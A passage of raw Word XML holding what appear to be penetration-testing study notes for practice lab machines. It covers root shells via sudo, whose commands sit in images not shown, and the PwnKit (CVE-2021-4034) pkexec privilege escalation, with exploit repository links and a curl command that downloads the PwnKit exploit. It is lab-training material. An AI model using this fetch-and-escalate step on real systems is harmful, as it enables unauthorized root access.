          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3vdgyxc70kts" w:id="426"/>
      <w:bookmarkEnd w:id="426"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root shell using sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003021">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3028950" cy="1666875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="438" name="image434.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image434.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1064"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="30289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3022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first 3 all open shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The last one allows you to change the password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003024">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030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26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cjfkey69z38r" w:id="427"/>
      <w:bookmarkEnd w:id="427"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwnkit and polkit (/usr/bin/pwnkit) (CVE-2021-4034)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003027">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003028">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Lina's cheatsheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003029">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwnkit exploit has python version: pkexec 0.105-26, 0.117-2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1065">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Snookums</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice they found CVE-2021-4034 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">highlighted in yellow from linPEAS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. They used this exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId1066">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/joeammond/CVE-2021-4034</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="480"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They also mentioned </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exghost PG Practice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the same vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000302F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1067">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice (for one writeup, not the other). They used the same </w:t>
      </w:r>
      <w:hyperlink r:id="rId1068">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">github</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as above. But Venkat said in the official writeup there was some compiling debugging stuff we had to do. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003030">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003031">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1943100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="445" name="image432.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image432.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106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3032">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003033">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003034">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">polkit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Linux system service that controls which users can perform privileged actions (like rebooting, installing packages) without full root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003035">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pkexec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool that comes with polkit — it lets you run a command as another user (usually root), similar to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but it relies on polkit's authorization rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003036">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relation:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pkexec uses polkit to check if a user is allowed to elevate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003037">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID + pkexec → root:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pkexec is installed with the SUID bit, meaning it runs as root. If there's a vulnerability (like in PwnKit) — e.g., poor input validation — an attacker can exploit it to execute arbitrary code as root, bypassing normal polkit checks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003038">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—--------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003039">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was manually exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1070">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Djinn3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. They found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/pwnkit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID privileges</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and knew to exploit it with this CVE. This is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-4034 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This polkit I use for privilege escalation "</w:t>
      </w:r>
      <w:hyperlink r:id="rId1071">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ly4k/PwnKit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-----------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPeas found it in the SunsetDecoy PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003040">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="32" name="image45.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image45.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId107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3041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From LinPeas, we can see that this box (which is </w:t>
      </w:r>
      <w:hyperlink r:id="rId1073">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetDecoy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play) is vulnerable to PwnKit exploit. Not all walkthroughs used this exploit, just fyi, so don't be surprised if you see a walkthrough that doesn't use this. But this specific link does. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="622"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003043">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003044">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030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46">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003047">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003048">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rt5pcwcpee7n" w:id="428"/>
      <w:bookmarkEnd w:id="428"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003049">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP Enumeration taught in</w:t>
      </w:r>
